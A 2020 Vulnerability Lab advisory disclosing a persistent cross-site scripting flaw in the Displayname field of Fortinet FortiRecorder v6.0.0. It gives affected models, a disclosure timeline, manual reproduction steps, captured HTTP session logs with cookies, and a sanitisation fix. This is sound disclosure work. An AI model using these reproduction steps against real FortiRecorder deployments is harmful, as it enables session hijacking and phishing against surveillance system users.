Document Title: =============== Fortinet FortiRecorder v6 - Persistent XSS Vulnerability Date: ===== 2020-06-22 References: =========== https://www.vulnerability-lab.com/get_content.php?id=2218 VL-ID: ===== 2218 Common Vulnerability Scoring System: ==================================== 4.8 Vulnerability Class: ==================== Cross Site Scripting - Persistent Introduction: ============= Surveillance systems can be complicated, expensive, and unreliable. But FortiCamera and FortiRecorder simplify IP video surveillance and there are no license fees. With FortiCams, you can see everything: doors, POS terminals, public areas--whatever you need to keep an eye on. FortiRecorder captures the images for easy monitoring, storage, and retrieval. Just plug in your cameras, connect the FortiRecorder, open a web browser or client application, and you're ready to go. It's easy to navigate and configure with event timelines and profile-driven configuration. FortiCameras with FortiRecorder give you everything you need for complete site video security. (Copy of the Homepage: https://www.fortinet.com/products/network-based-video-security/forticam-fortirecorder.html ) Abstract: ========= The vulnerability laboratory core research team discovered a persistent input validation web vulnerability in the Fortinet FortiRecorder v6.0.0. Affected Product(s): ==================== Fortinet Product: Fortinet Fortirecorder v6.0.0 - (Appliance Web-Application or VM) Supported Model(s): ================== FortiRecorder-400F Network Video Recorder with 1x4TB (4x8TB max) HD FortiRecorder-400D Network Video Recorder with 2x3TB (4x4TB max) HD FortiRecorder-200D-Gen02 Network Video Recorder with 3TB HD FortiRecorder-200D Network Video Recorder FortiRecorder-100D Network Video Recorder FortiRecorder-VM (64bit) Network Video Recorder for VMware vSphere Hypervisor ESX/ESXi v5.0 and higher Microsoft Hyper-V 2008 R2 and 2012 Citrix XenServer v5.6sp2, 6.0 KVM (qemu 0.12.1) AWS (EC2 PAYG) FortiCam-20A Network Camera FortiCam-MB40 Network Camera FortiCam-MB13 Network Camera FortiCam-MD20 Network Camera FortiCam-MD40 Network Camera FortiCam-MD50 Network Camera FortiCam-OB20 Network Camera FortiCam-OB30 Network Camera FortiCam-FD20 Network Camera FortiCam-FD20B Network Camera FortiCam-FD40 Network Camera FortiCam-CB20 Network Camera FortiCam-SD20 Network PTZ Camera FortiCam-SD20B Network PTZ Camera FortiCam-FE120 Network Panoramic Camera FortiAPCam-214B Network Camera and Access Point Report-Timeline: ================ 2020-03-19: Researcher Notification & Coordination (Security Researcher) 2020-03-19: Vendor Notification 1 (Security Department) 2020-03-27: Vendor Notification 2 (Security Department) 2020-**-**: Vendor Response/Feedback (Security Department) 2020-**-**: Vendor Fix/Patch (Service Developer Team) 2020-**-**: Security Acknowledgements (Security Department) 2020-06-23: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== A persistent input validation web vulnerability has been discovered in the official Fortinet FortiRecorder v6.0.0 web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The vulnerability is located in the Displayname input field of the Preferences Module. Local low privileged application user accounts are able to inject own malicious persistent script code as Displayname for application-side manipulation. The request method to inject is POST and the attack vector is persistent. The input of the name values in insecure sanitize which allows low privileged user account to perform attacks in the fortirecorder backend/frontend. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Input(s): [+] Displayname Affected Module(s): [+] /monitor_grp/camera_notification_monitor [+] admin/Admin Proof of Concept: ================= The persistent input validation web vulnerability can be exploited by low privilege web-application user account with low user interaction. For security demonstration or to reproduce the persistent web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Login with a restricted web-application user account to the fortirecorder ui 2. Open the preferences module 3. Inject malicious test script code payload as Displayname 4. Save and submit the entry Note: Execution occurs in the following modules `/monitor_grp/camera_notification_monitor` & `admin/Admin (others may affected as well)` 5. Successful reproduce of the persistent validation web vulnerability! PoC: Vulnerable Source --- PoC Session Logs [POST] https://fortirecorder.localhost:8000/module/admin.fe Host: fortirecorder.localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Content-type: application/x-www-form-urlencoded Content-Length: 82 Origin: https://fortirecorder.localhost:8000 Connection: keep-alive Referer: https://fortirecorder.localhost:8000/admin/Admin.html Cookie: APSCOOKIE=Era%3D1%26Payload%3DFoyivmVcFnVgygO1dgVkO9rX5tZ5Oy98GUp0f6U%2FSiajVczPfH5LLbPKoCk%2FyBQA%0AEuF9b cyW71eFebbDjFTXc3pX9mtHuPrElMnZVP11xzjsSvuiAw78kjsy%2B0bvacWo%0Azoh5uISpF%2FyemSH%2BJ82guXm%2BQy7tlnmAW0b4qgwWU2w %3D%0A%26AuthHash%3DZmkC8yESInXgEeOcfA0oWw%3D%3D%0A fewReq=:B:JVQwPjwweG97RWhgb2l N1lzeV5jZ29Ha2R/a2YseG97S2l Y2VkNzsseWFjel5nX3o3Ow - POST: HTTP/1.1 200 OK Date: Sun, 19 Apr 2020 16:16:43 GMT Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubDomains Access-Control-Allow-Origin: https://auth.localhost:8000 Access-Control-Allow-Credentials: true Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 184 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain - https://fortirecorder.localhost:8000/module/admin.fe Host: fortirecorder.localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Content-type: application/x-www-form-urlencoded Content-Length: 78 Origin: https://fortirecorder.localhost:8000 Connection: keep-alive Referer: https://fortirecorder.localhost:8000/admin/Admin.html Cookie: APSCOOKIE=Era%3D1%26Payload%3DFoyivmVcFnVgygO1dgVkO9rX5tZ5Oy98GUp0f6U%2FSiajVczPfH5LLbPKoCk%2FyBQA%0 AEuF9bcyW71eFebbDjFTXc3pX9mtHuPrElMnZVP11xzjsSvuiAw78kjsy%2B0bvacWo%0Azoh5uISpF%2FyemSH%2BJ82guXm%2BQy7tlnmA W0b4qgwWU2w%3D%0A%26AuthHash%3DZmkC8yESInXgEeOcfA0oWw%3D%3D%0A fewReq=:B:JVA0Oj00fGt/QWxka216M113fU1vY09qY2dgKHxrf09temdhYDM7KGNla3czamtjYQ - POST: HTTP/1.1 200 OK Cache-Control: no-cache Set-Cookie: APSCOOKIE=Era%3D1%26Payload%3DFoyivmVcFnVgygO1dgVkOxjzfdjO%2F0L3FqUELHN9GZ2YtAiR5GLSMPyd%2BGZ7tAhM %0Ah1e%2FBUIs0oVnvl7%2Bf91PYBivhoX5lkM6pHmlVvTMWGhBmnIqdtFlR9SZnsxXTxPd%0ASH26S9wTNjb%2FcjhKATX52hUZ4EtrEtmKgq gv7DY2%2FrM%3D%0A%26AuthHash%3DhZuR9qtzGlGU4IiUFl0zug%3D%3D%0A; Path=/; Version=1 Access-Control-Allow-Origin: https://auth.localhost:8000 Access-Control-Allow-Credentials: true Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 168 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/plain - https://fortirecorder.localhost:8000/module/admin.fe Host: fortirecorder.localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Content-type: application/x-www-form-urlencoded Content-Length: 198 Origin: https://fortirecorder.localhost:8000 Connection: keep-alive Referer: https://fortirecorder.localhost:8000/admin/Admin.html Cookie: APSCOOKIE=Era%3D1%26Payload%3DFoyivmVcFnVgygO1dgVkO%2Fk2FNS6QnQuN3VznudhkJFHkLX9cJJSom%2B1KrJnf qxd%0AG2zv1DpT4ZWTm3tCmLyuKS1ZV8xZsKEiqIHy5RUWK50tKAHbrVHNOOcsyjZ9u6oW%0AgufH9ZaFyVvpUm%2BzLQCCnoMu6SwA UhMECYVNnx3pfvY%3D%0A%26AuthHash%3D3c7wx%2BviA6C%2FnXlJwQHVDA%3D%3D%0A fewReq=:B:JVMxOjg5MXluekRpYW5ofzZYcnhIamZKb2ZiZS15bnpKaH9iZGU2PC1mYG5yNm9uZmQtZWpmbjZPbmZkLjk7ZHtueWp/ZH ktfnhueWVqZm42b25mZC1vYnh7Z2pyZWpmbjZPbmZkLjk7ZHtueWp/ZHktbmZqYmc2b25mZC4/O21keX9iZW5/JWhkZg - POST: HTTP/1.1 200 OK Cache-Control: no-cache Set-Cookie: APSCOOKIE=Era%3D1%26Payload%3DFoyivmVcFnVgygO1dgVkOycvzoZshHSqkFVa7DlxYGRBYAFQfedW9elsQaBBFEX7 %0AwVDWbI5MGM7MUpi4t9SXlM79O0YxSUCeS%2FIops3pNPgEcGYVvolknR8b3B2ud4hc%0AeG%2FAsCzGc5FTzROa0DTI5g76pIKVVUSy Jm%2FSQxUSoRY%3D%0A%26AuthHash%3DAHVkHPF3lBV%2F7GJzWDlLMQ%3D%3D%0A; Path=/; Version=1 Strict-Transport-Security: max-age=31536000; includeSubDomains Access-Control-Allow-Origin: https://auth.localhost:8000 Access-Control-Allow-Credentials: true Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 179 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Reference(s): https://auth.localhost:8000 https://fortirecorder.localhost:8000/ https://fortirecorder.localhost:8000/admin/ https://fortirecorder.localhost:8000/module/admin.fe https://fortirecorder.localhost:8000/admin/Admin.html Solution: ========= The vulnerability can be patched by a secure parse and sanitize of the displayname input field. In a second step the vulnerable output locations must as well be sanitized via encode. It is possible to as well restrict the input fields using special chars on client-side inputs. Risk: ===== The security risk of the persistent cross site scripting web vulnerability in the fortirecorder application is estimated as medium. Credits: ======== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™